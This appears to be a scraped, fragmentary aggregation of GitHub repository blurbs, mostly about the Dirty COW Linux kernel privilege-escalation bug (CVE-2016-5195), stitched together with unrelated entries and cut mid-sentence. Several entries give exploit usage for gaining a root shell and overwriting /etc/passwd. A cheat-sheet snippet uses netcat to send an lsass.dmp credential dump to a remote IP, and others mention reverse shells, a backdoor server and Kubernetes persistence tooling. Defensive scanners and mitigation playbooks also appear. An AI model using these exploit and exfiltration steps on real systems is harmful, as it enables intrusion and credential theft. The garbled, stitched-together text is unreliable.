CVE-2016-5195

Description: dcow is a possible exploit of the vulnerability CVE-2016-5195 Running the program as unprivileged user on a vulnerable system, it'll modify the /etc/passwd file, forcing the password "dirtyCowFun" (SHA-512, but could be modified for older standards) In case of successful execution, doing a "su" with that password, a root shell will be ava

快译通电子词典 A63 新版本 Archlinux + X11 + LXDE 及相关资料

polaris-dict-a63-arch 快译通电子词典 A63 新版本 Archlinux + X11 + LXDE 及相关资料 启动器激活Android图标 见 启动器激活Android图标相关工具 Archlinux + X11 + LXDE 取得root权限: 用专有软件Kingroot的简体中文Microsoft Windows版或English Android版。建议用简体中文Microsoft Windows版。 安装并配置Xserver XSDL和LinuxDeplo

XDU-SCE_OS-Experiment_2021 西安电子科技大学网络与信息安全学院 2019 级操作系统实验报告 by arttnba3 Environment Ubuntu 2004 Exp-1 Syscall Basis 大概是要手写一个 cp 程序，然后用 strace 查看过程中用到的系统调用 Exp-2 Muitiprocess Programming - Linux Shell 手写一个 shell ，代码可以直接参见 a3shell ，详细说明可�

read-only write local privesc using CVE-2016-5195

rootcow CVE-2016-5195 exploit

CTF Writeups - Luiz Mlo Este é um repositório criado para mostrar CTF's que já participei, além das minhas soluções e métodos para resolução dos desafios CPBSB3 Decred CTF Este foi um CTF realizado durante a Campus Party de 2019 em Brasília pela equipe de desenvolvimento da criptomoeda Decred (DCR) Fiqu

DirtyCow-EXP 编译好的脏牛漏洞（CVE-2016-5195）EXP，分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考： brucetggithubio/2018/05/27/DirtyCow%EF%BC%88%E8%84%8F%E7%89%9B%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability

Privilege-Escalation-For-Linux To bypass security restrictions in misconfigured systems List of Automated Eumeration Tools 👇🏻 LinPeas - githubcom/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS LinEnum - githubcom/rebootuser/LinEnum LES - githubcom/mzet-/linux-exploit-suggester Linux Smart Enumeration - git

ECE 9069: Introduction to Hacking Dirty Cow CVE-2016-5195 It is a linux based vulnerability which existed since 2007 and got fully patched in 2017 It is a vulnerability since kernel version 2622 until patched It escalates privileges of the user by using race condition and copy-on-write mechanism So essentially a normal user can gain root access and can read, edit, delete

scumjrs PoC for Dirty COW (CVE-2016-5195)

snow_crash Security project of 42school Link to the VM: projectsintra42fr/uploads/document/document/5137/SnowCrashiso Level00 Find interesting files: find / -user flag00 File conraining cdiiddwpgswtgt founded Supposed to be a Caesar Cipher Use Dcode Password is: nottoohardhere Flag is: x24ti5gi3x0ol2eh4esiuxias level01 Find interesting files: find / -user flag

CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android $ make run ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk make[1]: Entering directory `/CVE-2016-5195' [armeabi] Install : dirtycow => libs/armeabi/dirtycow [armeabi] Install : run-as => libs/armeabi/run-as make[1]: Leaving directory `/CVE-2016-5

Dirty Cow root exploit

List of files mainc This is our main file with all the source code and all magic is happening here mainh This is our main file with all the functions and constants for the main file When you make the rules prog (well, or simply not shit), this file must be present, where we write the notation for all functions (which arguments are accepted, what are called and which types a

Dirty COW (CVE-2016-5195) Testing

Dirty-COW-CVE-2016-5195-Testing Dirty COW (CVE-2016-5195) Testing

A module for managing checks and fixes for the 'dirty cow' kernel bug

Overview Usage - The basics of getting started with simp-dirtycow Development - Guide for contributing to the module Overview In October 2016, a privilege escalation vulnerability was discovered in the Linux kernel It has been given the name "Dirty Cow" and assigned a Common Vulnerability and Exposures (CVE) number CVE-2016-5195 This module checks your running ker

0xdeadbeef PoC for Dirty COW (CVE-2016-5195) This PoC relies on ptrace (instead of /proc/self/mem) to patch vDSO It has a few advantages over PoCs modifying filesystem binaries: no setuid binary required SELinux bypass container escape no kernel crash because of filesystem writeback And a few cons: architecture dependent (since the payload is written in assembly) doesn

(` ,-, ` ` ,;' / ` ,'/ ' ` X /' -;--''--_` ` ( ' / ` , ` ' Q ' , , `_ \ ,| ' `-;_' : ` ; ` ` --,_; ' ` , )

DirtyCow-EXP 编译好的脏牛漏洞（CVE-2016-5195）EXP，分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考： brucetggithubio/2018/05/27/DirtyCow%EF%BC%88%E8%84%8F%E7%89%9B%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

The subject provides an in-depth technical overview of mobile security architectures, new security risks and threats of modern mobile platforms and operating systems. Lab tutorials provide students with programming techniques (Android) in Cryptography, Network security, and Database security, and security tools in mobile penetration testing.

Cyber-Security-for-Mobile-Platforms The subject provides an in-depth technical overview of mobile security architectures, new security risks and threats of modern mobile platforms and operating systems Lab tutorials provide students with programming techniques (Android) in Cryptography, Network security, and Database security, and security tools in mobile penetration testing

脏牛Linux本地提权漏洞复现(CVE-2016-5195)

dirtcow 脏牛Linux本地提权漏洞复现(CVE-2016-5195) *0、 使用命令 uname -a 命令查看linux内核信息 *1、 下载EXP到本地/服务器 *2、 使用 gcc -pthread dirtyc -o dirty -lcrypt 命令对dirtyc进行编译，生成一个dirty的可执行文件 *3、 执行 /dirty pass ，即可进行提权，pass为设置的密码 参考链接：wwwjianshuco

read-only write local privesc using CVE-2016-5195

rootcow CVE-2016-5195 exploit

0xdeadbeef PoC for Dirty COW (CVE-2016-5195) This PoC relies on ptrace (instead of /proc/self/mem) to patch vDSO It has a few advantages over PoCs modifying filesystem binaries: no setuid binary required SELinux bypass container escape no kernel crash because of filesystem writeback And a few cons: architecture dependent (since the payload is written in assembly) doesn

CVE-2016-5195 my personal POC of CVE-2016-5195(dirtyCOW)

中文翻译: 视频字幕 <youtube:liveoverflow> 01黑客考虑中，因为本视频系列的考试网站已经没有了，所以我不打算继续校对了抱歉

01 黑客 (LiveOverFlow 频道) 视频系列 尚未与作者沟通，(因有意上传 B 站，所以校对好几个视频的字幕再说)，这里放着字幕文件，与进度描述。 帮忙 其实我按顺序来的，要帮忙，就往下，几个校对就好。 名 述 英文字幕文件 来自 youtube 的下载，虽不是 100% 正确，但大致无伤大雅（时

Clean your RHEL 6.x COW, it's dirty

Description These are instructions to fix the Dirty COW vulnerability on recent RHEL/CentOS 6x versions It has been verified to work on the following kernels: RHEL/CentOS 67: kernel-2632-573x RHEL/CentOS 66: kernel-2632-504x RHEL/CentOS 65: kernel-2632-431x RHEL/CentOS 64: kernel-2632-358x RHEL/CentOS 63: kernel-2632-279x RHEL/CentOS 62: kernel-2632-22

Farm root is a root for android devices using the dirty cow vulnerability

Farm Root Farm root is a rooting utility for android devices using the dirty cow vulnerability Support Right now it doesn't have support for easy mode root, just pulling and pushing images only tested on galaxy s7 active only works for arm64v8 Showing the status make log Pulling an image make pull Pushing an image (flashing) Place the image you want to flash in the roo

Description Playbook for testing the dirty cow vulnerability (CVE-2016-5195) Dependencies local user on the system with sudo priveleges Run ansible-playbook -i host, checkyml -u jondoe -k -K Links dirtycowninja

os experiment 4 CVE-2016-5195

os-experiment-4 os experiment 4 CVE-2016-5195 /runsh

脏牛（Dirty Cow）是Linux内核的一个提权漏洞，攻击者可以利用这个漏洞获取root权限。

dirtycow 脏牛（Dirty Cow）是Linux内核的一个提权漏洞，攻击者可以利用这个漏洞获取root权限。之所以叫Dirty Cow，因为这个漏洞利用了Linux的copy-on-write机制。脏牛的CVE编号是CVE-2016-5195。 脏牛的影响范围很大，几乎涵盖了主流的Linux发行版。Linux内核&gt;=2622（2007年发行）开始就受影响了，�

Dirty Cow Vulnerability Exploit- Linux System

DataSecurity Dirty Cow Vulnerability Exploit- Linux System In mid-2016, CVE-2016-5195 (Common Vulnerabilities and Exploits) or ‘Dirty Cow’ is patched Dirty Cow is a Linux kernel race condition, which can lead to local privilege escalation Which means a non-root user can use this exploit in a vulnerable system (Linux based system) can get root access (unauthorised)

CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android $ make run ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk make[1]: Entering directory `/CVE-2016-5195' [armeabi] Install : dirtycow =&gt; libs/armeabi/dirtycow [armeabi] Install : run-as =&gt; libs/armeabi/run-as make[1]: Leaving directory `/CVE-2016-5

Root the ISO - 42 project

Boot2Root Résumé: Ce projet est une introduction à la pénetration d’un système Après tout vos efforts vous allez enfin pouvoir vous amuser ! Ce projet est donc une base pour vous faire comprendre comment vous devez procéder pour pénétrer un systéme sur lequel vous avez les droits légalement p

Homework

OTUS Домашние задания по курсу "Безопасность Linux" hw_1 - Разворачиваем лабораторную среду на базе Kali Linux и CentOS с помощью Vagrant Полезные ссылки: Download Vagrant Образ CentOS 7 Образ Kali Linux hw_2 - Освоение практических приме�

some N-days I've decided to exploit cve-2016-5195 (dirty cow)

EDB-ID:40839 CVE:2016-5195

playbooks

ansi-playbooks playbooks Ansible cat hosts [Server_Checklist_Installation] ip cat siteyml hosts: Server_Checklist_Installation remote_user: user sudo: true roles: - checklist tasks file for common name: Copying resolvconf file to remote copy: src: /etc/ansible/server_checklist/checklist/files/resolvconf dest: /etc/

Dirtycow also is known as CVE-2016-5195

Dirtycow also known as CVE-2016-5195 and it's very populer vulnerability of past time

things icarus custom archiso profile for CTF players TODO: list of features lol TODO: screenshots? archer automated arch linux install script for brainlets features menu based installer hardware detection -boot mode (bios/uefi) : for bootloader -cpu (intel/amd) : for microcode -gpu (intel/amd/nvidia/nvidia optimus) : for graphics driver -battery : for tlp and battery life opt

BIT_NetworkSecurity2021Spring The final work of Network Security Course CVE-2016-5195

Practical Useful commands to get started Working with ports and services netcat : Command used for interacting with TCP/UDP ports Connecting to shells Connect to any listening port and interact with the service running on that port netcat 10101010 22 : Helps identify what service is running on a particular port while showing the version etc This is called Banner grabbi

CVE-2016-5195 Ported golang version of dirtycowc make setup &amp;&amp; /main

Repo For Working on Dirty Cow Based Android Root Method

DirtyCowAndroid Repo For Working on Dirty Cow Based Android Root Method Currently Linux Only Youtube: wwwyoutubecom/watch?v=bzrRWfDOQcM Should Spawn a root shell on device Usage sudo make root Output: [] mmap 0xb6f00000 [] exploit (patch) [] currently 0xb6f00000=464c457f [] madvise = 0xb6f00000 13708 [] madvise = 0 1048576 [] /proc/self/mem 0 1048576 [*] exploited 0xb

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB It does not disable SELinux (see githubcom/timwr/CVE-2016-5195/issues/9) or install superuser on the device $ make root ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk APP_PLAT

A CVE-2016-5195 exploit example.

Description: dcow is a possible exploit of the vulnerability CVE-2016-5195 Running the program as unprivileged user on a vulnerable system, it'll modify the /etc/passwd file, forcing the password "dirtyCowFun" (SHA-512, but could be modified for older standards) In case of successful execution, doing a "su" with that password, a root shell will be ava

Scan vuls kernel CVE-2016-5195 - DirtyCow

Dirty Cow Kernel Checker Scan vuls kernel CVE-2016-5195 - DirtyCow ####Usage#### Local System git clone githubcom/aishee/scan-dirtycow cd scan-dirtycow &amp;&amp; chmod +x dirtycowscansh &amp;&amp; /dirtycowscansh ####Vulnerable Kernels#### RedHat Debian Ubuntu: 1204-1404-1604 References dirtycowninja/

编译好的脏牛漏洞（CVE-2016-5195）EXP

DirtyCow-EXP 编译好的脏牛漏洞（CVE-2016-5195）EXP，分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考： brucetggithubio/2018/05/27/DirtyCow%EF%BC%88%E8%84%8F%E7%89%9B%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android $ make run ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk make[1]: Entering directory `/CVE-2016-5195' [armeabi] Install : dirtycow =&gt; libs/armeabi/dirtycow [armeabi] Install : run-as =&gt; libs/armeabi/run-as make[1]: Leaving directory `/CVE-2016-5

Protect-CVE-2016-5195-DirtyCow-

dirtycow CVE-2016-5195 exploit Installation Go to the release section or use your crystal environment Usage dirtycow --target /path/to/root/file --string "string to write" --offset &lt;offset_in_file&gt;

CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB It does not disable SELinux (see githubcom/timwr/CVE-2016-5195/issues/9) or install superuser on the device $ make root ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk APP_PLAT

Dirty-Cow-Explanation-CVE-2016-5195-

每日收集喜欢的开源项目 | RSS 订阅 | 快知 app 订阅

favorite link 收集喜欢的网址 RSS 订阅 | 快知 app 主题订阅 License GNU General Public License v30 August 14, 2020 用 Vuejs 开发的跨三端应用 1、我写的三十万字图解算法题典 2、100 张 IT 相关超清思维导图 3、100 篇大厂面经汇总 4、各语言编程电子书 100 本 5、 LeetCode-Go IP2Location Laravel Extension 基于d2-admi

some N-days I've decided to exploit cve-2016-5195 (dirty cow)

DirtyC0W exploit project

TURUT This is the README file for the post exploitation project nicknamed "TuruT" The project is designed for the COSC481 Case Studies course The Project's goals are to plant persistence as the root user, after cracking a hash for a non-sudo user This is done by taking advantage of CVE-2016-5195 otherwise known as DirtyC0W This exploit takes advantage of a race

Offensive Security Certified Professional

Getting Started Created: Aug 12, 2020 12:14 AM Last Edited Time: Aug 19, 2020 12:16 AM Status: Complete Type: Description Overview Why do we have to learn mock hacking? With the start of the fourth industrial era, information protection in the Internet environment began to gain popularity, and the demand for white hackers began to increase In this era, the importance of info

dirtycow-docker-vdso This repository is the necessary bits to get the vdso based Dirty Cow POC working inside a docker container All the really exciting stuff was done by Scumjr, see his POC repo over at githubcom/scumjr/dirtycow-vdso There is also a writeup and youtube video of using the above exploit to break out of a docker container on my blog: blogparan

Understanding_DirtyCOW A resource for novice security researchers to learn about the DirtyCOW vulnerability What is DirtyCOW? Dirty Copy-On-Write (COW) is a vulnerability affecting Linux Kernel Versions 2622 - 483 It was initially found be security researcher Phil Oester It's official name is CVE-2016-5195 and it is rated a CVSS base score of 78, which is categoriz

FYI - This repo is a collection of my contents I have been writing contents occasionally throughout my career at various places I decided to collect, organize and share everything here Hence created this repo A few of the content might not be relevant now as they are of 2012 and 2013, but I decided to add them here Knowing them might populate new ideas to anyone's brai

VIKIROOT This is a CVE-2016-5195 PoC for 64-bit Android 601 Marshmallow (perhaps 70 ?), as well as an universal &amp; stable temporal root tool It does not require a SUID executable or any filesystem changes Features SELinux bypass (see below for details) Memory-only: does not modify the filesystem or need special executable Stable: does not affect stability of your

dirtycow-arm32 This short guide will explain how I got unrestricted root access on my phone It should work for any arm32 android with dirtyc0w support required software: arm compiler toolchain, I suggest the android-ndk-compiler android libsepol: androidgooglesourcecom/platform/external/libsepol adb, android debug bridge suggested software: ida pro Demo version i

CVE-2016-5195

Android APK Based On Public Information Using DirtyCOW CVE-2016-5195 Exploit

orgcowpoopmoooooo Android APK Based On Public Information Using DirtyCOW CVE-2016-5195 Exploit ##THIS IS A CURRENTLY A NON-WORKING APPLICATION ##I WILL REMOVE THIS ONCE TESTING IS SUCCESSFUL

PC Engines APU kernels and tools

PC Engines APU Repository for the PC Engines APU embedded system board (SBC) Index Debian 9 Stretch PC Engines APU LEDs Voyage Linux Tiny Core Linux Enable Serial Console Renamed repository from "voyage-linux" to "pc-engines-apu" as a more appropriate description It still contains the same Voyage Linux Kernel and the LED driver for plain vanilla Debian D

Ansible playbook to mitigate CVE-2016-5195 on CentOS

Ansible CVE-2016-5195 mitigation playbook Ansible playbook to mitigate CVE-2016-5195 on CentOS/Scientific Linux with SystemTap Automating this mitigation recipe found on Red Hat Bugzilla: bugzillaredhatcom/show_bugcgi?id=1384344#c13 This playbook install Kernel debuginfo packages and SystemTap Then it will generate a SystemTap module and runs it in the background

Android attempt at PoC CVE-2016-8655

CVE-2016-5195 GoldFish 34 This works on the goldfish 34 Emulator Initroot: alephsecuritycom/2017/06/07/initroot-moto/ has been released for my device (harpia), so I have stopped porting the exploit to my device (harpia/) I have learnt a large amount from working on this project, but initroot appears to be a better option goldifsh/ has the files to exe

Example exploit for CVE-2016-5195

Disclaimer I am not responsible for anything you do with this code This code comes with no warranty Description Exploit for CVE-2016-5195 which maps a readonly SUID executable to memory (readonly) and uses the race condition to overwrite it with an ELF of our choice Payloads are available in NASM format alongside the exploit code(cowshell-x86asm &amp;&amp; cowshell

OSCP_Cheat_sheet Information Gathering DNS Zone Transfer nslookup set type=a,cname,ns,mx server &lt;domainorIP&gt; dig dig axfr domain @IP 1m0SCPc3rt1f13d! Post Exploitation Sending Files nc Simple File Transfer To receive: nc -l -p 9999 &gt; fromMacfile To send: \ncexe 192168119123 443 &lt; lsassdmp With Compression To receive: nc -l -p

demo1 This demo is based on githubcom/timwr/CVE-2016-5195 make test output: user@user:/$ cd /home/user/demo1 &amp;&amp; make test /home/user/adb/android-ndk-r21d/ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk APP_ABI=x86_64 APP_PLATFORM=android-23 make[1]: Entering directory '/home/user/demo1' [x86_64] Install : dirtycow =&gt; l

Dirty-Cow-Explanation-CVE-2016-5195-

TURUT This is the README file for the post exploitation project nicknamed "TuruT" The project is designed for the COSC481 Case Studies course The Project's goals are to plant persistence as the root user, after cracking a hash for a non-sudo user This is done by taking advantage of CVE-2016-5195 otherwise known as DirtyC0W This exploit takes advantage of a race

Ubuntu-touch (15.04) dirtycow PoC

UT-DirtyCow Glasswall BV Proof of Concept to exploit the DirtyCow CVE-2016-5195 exploit on Ubuntu touch This PoC is tested 12 sep 2017 on the Ubuntu touch (tested on Fairphone 2) stable release installed with the CPT tool OS version: Ubuntu 1504 (r1) (20170610) Kernel version: 340 Architecture: armv7l

Penetration Test CheetSheet 情報取集 FTP SSH SMTP DNS Finger POP SMB HTTP/HTTPS SNMP Nmap Exploit Search 権限昇格 Linux Windows その他 BufferOverFlow File転送 PHP PayloadCollection ReversShell MsfVenom 参考サイト 免責事項 情報取集 POP 接続 nc -nvC &lt;IP&gt; &lt;port&gt; user &lt;name&gt; pass &lt;password&g

Penetration Test CheetSheet 情報取集 FTP SSH SMTP DNS Finger POP SMB HTTP/HTTPS SNMP Nmap Exploit Search 権限昇格 Linux Windows その他 BufferOverFlow File転送 PHP PayloadCollection ReversShell MsfVenom 参考サイト 免責事項 情報取集 POP 接続 nc -nvC &lt;IP&gt; &lt;port&gt; user &lt;name&gt; pass &lt;password&g

Linux 本地提权漏洞

CVE-2016-5195 gcc -pthread dirtyc -o dirty -lcrypt 参考链接 githubcom/FireFart/dirtycow/blob/master/dirtyc

2nd-Year-Project-01-Linux-Exploitation-using-CVE-20166-5195 System Exploitation (May 2021) • Under System and Network Programming Module did a research and exploit a system for get to knowledge about exploitations and vulnerabilities • Identified vulnerability called CVE-2016-5195 on Linux systems and Exploited successfully as well as gained root access of that system

OSCP-Cheat-Sheets Preparation OSCP wwwnetsecfocuscom/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_20html scund00rcom/all/oscp/2018/02/25/passing-oscphtml liodeusgithubio/2020/09/18/OSCP-personal-cheatsheethtml blogadithyanakcom/oscp-preparation-guide/linux-privilege-escalation Recon nmap -P

Dirty-Cow Exploiting Linux Kernel Vulnerability: Dirty Cow (CVE-2016-5195) More details: Presentation Contact Find me at Elaheh Toulabinejad

Dirty Cow proof of concept app

DirtyCow CVE-2016-5195 Proof of Concept App Authors David Phan Joel Gomez - githubcom/jgome043 Overview Dirty COW is a privilege escalation vulnerability that allows an attacker to exploit a race condition vulnerability in the Copy-On-Write mechanism of the memory management in the Linux Kernel The exploit allows a non-privileged user to write to read-only memory spac

CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB It does not disable SELinux (see githubcom/timwr/CVE-2016-5195/issues/9) or install superuser on the device $ make root ndk-build NDK_PROJECT_PATH= APP_BUILD_SCRIPT=/Androidmk APP_PLAT

PoC for Dirty COW (CVE-2016-5195)

0xdeadbeef PoC for Dirty COW (CVE-2016-5195) This PoC relies on ptrace (instead of /proc/self/mem) to patch vDSO It has a few advantages over PoCs modifying filesystem binaries: no setuid binary required SELinux bypass container escape no kernel crash because of filesystem writeback And a few cons: architecture dependent (since the payload is written in assembly) doesn

Taken from https://github.com/brenns10/lsh

custombackdoorlshserver Backdoor lsh server for use with CVE-2016-5195 change u:r:system_server:s0 if necessary note:if you cant compile then copy libselinux from your device to lib folder in your platform (and arch) folder to compile with ndk: replace [put ndk path here] to your ndk path and replace arm64-v8a and/or android-23 if necessary export ndkpath=[put ndk path here] e

Reverse Engineering using Radare2

Radare2 Tutorial Reverse Engineering using Radare2 You should run the binary file on a VM and actually take a snapshot before you start Specially if you do dynamic analysis and you do not know what the sampe does (backdoor, worm, virus, ) Basics Introduction to Raddare2 Gitbook: Radare2-explorations Useful commands R2 Cheatsheet Radare2 tutorial A JOURNEY INTO RADARE 2

A puppet module to identify/remediate the Linux dirty COW kernel issue

Table of Contents Overview Module Description - What the module does and why it is useful Setup - The basics of getting started with dirtycow What dirtycow affects Setup requirements Beginning with dirtycow Usage - Configuration options and additional functionality Reference - An under-the-hood peek at what the module is doing and how Limitations - OS compatibility, etc De

Dirty Cow detection

ansible-dirty-cow Playbook to detect hosts without the good kernel version For more information about CVE-2016-5195 : webnvdnistgov/view/vuln/detail?vulnId=CVE-2016-5195 If host has not the good kernel version, it will update it You can edit this role and delete the file generation / change the file name, etc

Get temporary root by exploiting the dirtycow vulnerability.

This repo contains 2 seperate projects: 1 GetRoot-Android-DirtyCow And: 2 CVE-2016-5195 1 GetRoot-Android-DirtyCow Get temporary root on android by exploiting the dirtycow vulnerability Run in android or linux: /G1tR0oT Should execute and result in a root shell 2 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) poc for Android This repo (cloned from githubcom/timwr/CVE-

DirtyCOW_CVE-2016-5195 #Reference dirtycowninja githubcom/dirtycow/dirtycowgithubio/wiki/PoCs githubcom/dirtycow/dirtycowgithubio/wiki/VulnerabilityDetails #Links: wwwyoutubecom/watch?v=kEsshExn7aE firefartat

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

Security Knowledge Structure(安全知识汇总)

Security Knowledge Structure 欢迎大家提交ISSUE和Pull Requests。 1 企业安全 11 黑盒扫描 静态xss检测 对AWVS一次简单分析 初见Chrome Headless Browser 用phantomJS检测URL重定向 用SlimerJS检测Flash XSS 12 白盒扫描器 Cobra 13 WAF自建 如何建立云WAF 如何建立HTTPS的云WAF ngx_lua_waf VeryNginx lua-resty-waf 14 堡垒机 ju

List of some useful blogs, books, courses, papers etc.

Reading Material A collection of resources that I found useful and interesting across various domains The Tao of Programming Rob Pike's 5 Rules of Programming Contents Javascript Pilot Run Advanced Concepts Security Attacks Guides Games and CTF's Docker Algorithms Internet Webservers Protocols HTTP TCP/UDP DNS Load Balancing Git Linux Linux Kernel S

安全申明 本博客主要用于学习记录相关安全事件和漏洞文章，供大家学习交流和测试使用。由于传播、利用该博客文章提供的信息或者工具而造成任何直接或间接的后果及损害，均由使用本人负责，文章作者不为此承担任何责任。 漏洞描述 ​ CVE-2022-0847是自 58 以来Linux内核中的一个漏�

README Note: The code in this repo is to demo the isolation of secure pod sandbox technologies such as kata containers and does not intend to attack any platforms How to re-produce Get linux kernel 4130 patch 0001-CVE-2017-5123-help-to-make-attack-safelypatch Build Linux kernel with config Kconfig Boot kernel and get address of dac_mmap_min_addr, have_canfork_callback, p

Steps to follow when participating to CTF

CTF -- CTF AWESOME Steps to follow when participating to CTF Collaborative markdown notes See all opened ports, here # All ports nmap -p- 19216811 # This may detect more things, takes longer: Detects if ftp is vulnerable nmap -A 19216811 nmap -sV -A 19216811 nmap -A -O -T4 --script=vuln 192168166 Connect to a specific port nc -n 1921680157 13337 More info a

A curated list of my GitHub stars!

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Assembly Bro C C# C++ CMake CSS Clojure CoffeeScript Crystal Dart Dockerfile Eagle Elixir Elm Erlang Go HCL HTML Inno Setup Java JavaScript Jupyter Notebook Kotlin Lua Makefile Mathematica Objective-C Others PHP Perl PowerShell Puppet Python QML R Ruby Rust Scala Shell Swift TeX TypeScript Vim s

Manipulate K8s in a K8s way

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

安全测试工具集 简介 在学习和渗透测试过程中自己写的一些小脚本、小工具和一些常用字典、木马。 ++++++++++分割线+++++++++++ 其他工具渗透测试速查清单 站点信息收集 Google Fofa Shodan Zoomeye Goby whatweb Github robtex 快速探测存活主机 nmap nmap 1721821/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism

一些小脚本

日常脚本 更新采集中。。。 ##红队 信息收集 渗透工具: githubcom/lz520520/railgun 扫描工具Goby:githubcom/gobysec/Goby k8gege扫描器 githubcom/k8gege/K8CScan　　 长亭Xray githubcom/chaitin/xray　　 Dirsearch（扫目录） githubcom/maurosoria/dirsearch　　 Dirmap（扫目录） github

0x00 前言 收集了部分渗透测试、内网渗透、应急响应、代码审计、面试经验，方便学习整理 同步到个人博客 0x01 信息收集工具 综合自动化收集 水泽-信息收集自动化工具 企业信息收集 ENScan 基于爱企查的一款企业信息查询工具 cDomain 利用天眼查查询企业备案 JWS-icpscan ICP备案脚本，用于

Privileged Access Management (PAM) An ongoing &amp; curated collection of awesome software best practices and techniques, libraries and frameworks, E-books and videos, websites, blog posts, links to github Repositories, technical guidelines and important resources about Privileged Access Management (PAM) in Cybersecurity Thanks to all contributors, you're awesome and

Awesome List of my own!

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP C C# C++ CMake CSS CoffeeScript Dart Dockerfile Go HTML Java JavaScript Jupyter Notebook Kotlin Lua Makefile Objective-C Others PHP Pascal Python Rust Shell Smarty Swift TypeScript Vim script Vue ASP Koolshare-Clash - Run Clash Tunnel on Koolshare OpenWrt ledesoft - C multidict - The mu

文件有点大, 强烈建议下载到本地看! 文件有点大, 强烈建议下载到本地看! 文件有点大, 强烈建议下载到本地看! 1921681191 是攻击机 IP 192168119131 是被攻击 IP, Ubuntu 14045 LTS Brute Force low: zap or burpsuit medium: zap or burpsuit hight: 使用py进行暴力破解 import requests import re def fun():